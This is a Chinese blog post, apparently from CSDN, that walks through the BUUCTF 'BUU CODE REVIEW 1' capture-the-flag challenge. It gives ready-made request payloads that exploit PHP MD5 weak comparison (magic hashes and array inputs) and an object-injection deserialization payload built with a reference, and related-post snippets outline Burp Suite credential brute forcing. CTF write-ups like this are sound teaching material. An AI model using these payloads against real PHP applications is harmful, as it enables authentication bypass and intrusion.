BUU CODE REVIEW 1 1

最新推荐文章于 2024-05-26 20:35:54 发布
最新推荐文章于 2024-05-26 20:35:54 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: apache php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123851341
版权 
知识点:地址传值

在这里插入图片描述
法1:

GET:?pleaseget=1

POST:pleasepost=2&md51=QNKCDZO&md52=240610708&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

原理:QNKCDZO和240610708MD5一下为0e开头,又是弱等于,0的n次方还是0
法2:

GET:?pleaseget=1

POST:pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

原理:MD5无法加密数组,返回null所以相等

<?php
class BUU {
   public $correct = "";
   public $input ="";
}

$a = new BUU();
$a->input=&$a->correct;//把地址赋值过去,地址相同,值肯定也相同。
echo serialize($a);
?>

在这里插入图片描述

succ3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF/BUU CODE REVIEW 1
weixin_44041994的博客
03-20 664
2.判断GET参数pleaseget的值是否为1,POST参数pleasepost的值是否为2,参数md51和md52的值是否不等,经过md5加密后的参数md51和md52的值是否相等,这四个条件同时满足的话,对POST参数obj进行反序列化,而对象被反序列化时会调用__destruct方法。序列化的定义是:在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送)以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。最后是进行反序列化的obj。
BUUCTF】basic web BUU CODE REVIEW 1 1(反序列化漏洞,传引用判断相等)
weixin_45844670的博客
10-12 3308
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->corre
BUU CODE REVIEW 11
最新发布
2301_79968824的博客
05-26 481
2.判断GET参数pleaseget的值是否为1,POST参数pleasepost的值是否为2,参数md51和md52的值是否不等,经过md5加密后的参数md51和md52的值是否相等,这四个条件同时满足的话,对POST参数obj进行反序列化,而对象被反序列化时会调用__destruct方法。1.科学计数法绕过,原理是php里面在做 == 的时候会先把两边的类型转成一样的,因为是0e开头,php会认为它是科学技计数法,而0的多少次方都是0。而null是等于null的,导致了绕过。
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
qq_58869808的博客
07-26 1600
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
BUU CODE REVIEW 1
Jay17的博客
07-31 1320
BUU CODE REVIEW 1
【CTF练习】BUU CODE REVIEW 1(代码审计)
m0_73866435的博客
01-31 1513
大致流程第一个if满足进入的条件为第二个if满足条件为。第三个if满足条件为。如果 1、2、3 条件都满足之后就会执行反序列化,通过POST 传参obj 执行,然后进入类函数类函数也有一个if满足条件为。但是correct 却是利用一个时间进行计算的值的base64 值。那么为什么执行反序列化就会自动进行类函数执行呢,我们来了解一下魔术方法。
BUUCTF basic BUU CODE REVIEW 1&sqli-labs &BUU UPLOAD COURSE 1
网安小趴菜
08-26 1047
BUUCTF basic BUU CODE REVIEW 1&sqli-labs&BUU UPLOAD COURSE 1 wp
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2283
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
BUU CODE REVIEW 11反序列化
weixin_50339832的博客
09-09 584
反序列化漏洞 进入靶机是这个样子 首先进行分析后 看最后一行那个函数unserialize,判断反序列化 然后用post方法传obj变量,利用反序列化漏洞 这里要进行一个判断,就是buu类中的correct和input内容强相等,这里利用传引用的方法 到http://c.runoob.com/compile/1运行下列代码 <?php class BUU { public $correct=""; public $input=""; } $obj = new BUU...
CTF-反序列化
qq_61774705的博客
08-15 4332
反序列化
BUU CODE REVIEW
Sk1y的博客
08-23 667
代码审计,php反序列化
常见的MD5碰撞
aeymp589524的博客
10-31 402
md5值为0e开头 0e开头的md5和原值: QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611...
【Basic】BUU CODE REVIEW
欢迎来到我的学习笔记薄
05-21 839
写的非常详细,这道题比起前面几道有点难理解,建议反复观看。
BUUCTF——Basic题解
Zichel77的博客
08-17 5571
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
Buuctf-01
Usashi的博客
10-27 1269
Basic Linux Labs 参考链接 ssh -p 28309 root@node4.buuoj.cn -p指定端口,root为用户名,@后为ip地址 第一次连接需要输入yes ls ../ cat ../flag.txt flag{2a02935d-b864-48c0-850c-f8f4ef1e11cd} BUU LFI COURSE 1 <?php /** * Created by PhpStorm. * User: jinzhao * Date:.
codeReview--1 2019/12/30
军爸爸的博客
01-02 227
每一次的review会有很多问题暴露出来,争取每次消化两个点。真正的理解review 时讨论的东西。 今天在review的时候,大家对不同的问题提出了很多建议的地方,也有不同的解决方案,有设计的不合理的,有代码写法需要优化的等等,但是在讨论的时候有个需要注意的点:我们不管讨论什么,一直在说的是软件这个行业里的事,每个行业有它独特的发展方向,所以我们在讨论各种问题的时候,记得不能脱离软件行业里写...
BUU BRUTE 1 1
09-18
BUU BRUTE 1是一个爆破任务,根据引用所述,首先尝试爆破用户名,可以选择一个适合的字典进行爆破。接着,根据引用所述,可以切换到密码爆破模式,使用适当的字典或数字列表进行爆破。最后,根据引用所述,通过查看响应来获取flag。具体操作步骤如下: 1. 打开Burp Suite,配置代理并将目标网站的浏览器流量通过Burp Suite代理。 2. 在Burp Suite的Intruder选项卡中,将攻击类型设置为Cluster Bomb。 3. 在Payload Options中,选择Simple List作为Payload类型,并加载合适的用户名爆破字典。 4. 去掉Payload Encoding选项中的勾选。 5. 点击Start Attack开始用户名爆破。 6. 根据引用所述,接着切换到密码爆破模式。在Payload Options中,将Payload类型设置为Numbers,或继续使用Simple List加载包含0000~9999的密码字典。 7. 再次点击Start Attack开始密码爆破。 8. 查看响应,找到正确的密码并获取flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值